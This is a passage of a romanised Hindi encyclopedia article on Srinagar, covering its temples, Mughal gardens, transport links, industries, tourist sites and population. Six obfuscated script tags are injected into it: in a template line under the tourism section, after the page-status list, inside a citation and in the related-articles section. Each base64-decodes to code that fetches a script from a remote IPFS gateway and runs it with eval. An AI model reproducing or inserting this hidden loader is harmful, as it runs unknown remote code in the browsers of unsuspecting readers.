684-693 ee. mean maharaj chandrapadi dvara banavaya hua tribhuvan svami ka mandir bhi samip hi sthit tha. is par taanga baba namak ek pir ne adhikar karake ise daragah ka roop de diya. sultan sikandar ne 1404 ee. mean jama masjid banane ke lie maharaj tarapadi dvara 693-697 mean nirmit ek prasiddh mandir ko to d dala aur usaki sari samagri masjid banane mean laga di. 1623 ee. ke lagabhag begam noorajahaan ne, jab vah jahaangir ke sath kashmir aeean, suleman parvat ke oopar bana hua shankarachary ka mandir dekha aur isaki pai diyoan mean lage hue bahumooly patthar ke tuk doan ko ukh davakar unhean apani banavaee huee masjid mean lagava diya. keval shankarachary ka mandir hi ab shrinagar ka prachin hindoo smarak kaha ja sakata hai. kianvadanti ke anusar is mandir ki sthapana dakshin ke prasiddh darshanik shankarachary ne 8vian shati ee. mean ki thi. jahaangir tatha shahajahaan ke samay ke shalimar tatha nishat namak sundar udyan, tatha isi kal ki kee masjidean shrinagar ke pramukh aitihasik smarak haian. kaha jata hai ki nishatabag noorajahaan ke bhaee asaf khaan ka banavaya hua tha. shalimar ka nirman jahaangir aur usaki priy begam noorajahaan ne kiya tha. mugaloan ne kashmir mean 700 bag lagavae the.

yatayat aur parivahan

vayu marg

shrinagar mean shrinagar havaee-adda sthit hai. iandiyan eyaralains dilli, amritasar, jammoo, leh, chandigadh, ahamadabad aur mumbee se shrinagar ke lie u dan bharati hai. [[chitr:Nishat-Bagh-Srinagar.jpg|thumb|250px|left|nishat bag, shrinagar]]

rel marg

shrinagar se nikatatam relave steshan jammoo tavi hai. relave steshan se jammoo tavi 293 kimi ki doori par sthit hai. jammoo tavi relave steshan se dilli, kolakata, poona, muanbee, kanyakumari, ahamadabad adi pramukh nagaroan se niyamit rel seva upalabdh hai.

s dak marg

shrinagar rashtriy rajamarg dvara kee pramukh shaharoan se s dak marg dvara ju da hua hai.

udyog aur vyapar

shrinagar mean vishisht bazar aur khudara dukanean bhi haian. shahar ke udyogoan mean qalin v resham ki milean, chaandi aur taanbe ki vastuoan ka nirman, cham de ka kam aur lak di par naqqashi shamil haian. thumb|250px|shah hamadan masjid, shrinagar

shikshan sansthan

shrinagar shahar mean kashmir vishvavidyalay (1969) hai.

paryatan

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

shrinagar ka jammoo aur kashmir ke paryatan sthaloan mean bahut mahattvapoorn sthan hai. kashmir ghati ke madhy mean basa shrinagar bharat ke pramukh paryatan sthaloan mean se haian. shrinagar ek or jahaan dal jhil ke lie prasiddh hai vahian doosari or vibhinn mandiroan ke lie vishesh roop se prasiddh hai. svachchh jhil aur ooanche parvatoan ke bich base shrinagar ki arthavyavastha ka adhar lambe samay se mukhyatah paryatan hai. shahar se hokar nadi ke pravah par sat pul bane hue haian. isase lage vibhinn naharoan evan jalamargoan mean shikare bhare p de haian. shrinagar apane mandiroan aur masjidoan ke lie prasiddh hai.

darshaniy sthal

  1. shrinagar se lagi ek paha di jisako shankarachary paha di kahate haian, oopar adi shankarachary dvara sthapit shivaliang hai. paha di ki 2 mil kathin chadhaee hai. parvat ke niche shankaramath hai, ise durganag mandir kahate haian.
  2. shrinagar mean mahashri ka mandir chauthe pul ke pas tatha hariparvat par ek mandir hai. sanpoorn kashmir darshaniy hai. nagar mean patthar masjid, neharoo udyan darshaniy haian aur mugal udyan to apane sauandary ke lie hi prasiddh hai.
  3. kashmir mean kshir-bhavani, anantanag aur martand mandir darshaniy haian. in sab sthanoan par motar basean jati haian. shrinagar se motar bas se pahalagaanv jate samay madhy mean anantanag hai. martand mandir parvat par hai. niche pandoan ka gaanv matan hai, vahaan martand sarovar tirth hai[2].

janasankhya

2001 ki ganana ke anusar shri nagar ki kul janasankhya 8,94,940 hai. aur shrinagar zile ki kul janasankhya 12,38,530 hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vithika

tika tippani aur sandarbh

  1. rajatarangini, 1, 5,104
  2. hindoooan ke tirth sthan |lekhak: sudarshan sianh 'chakr' |prishth sankhya: 17 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>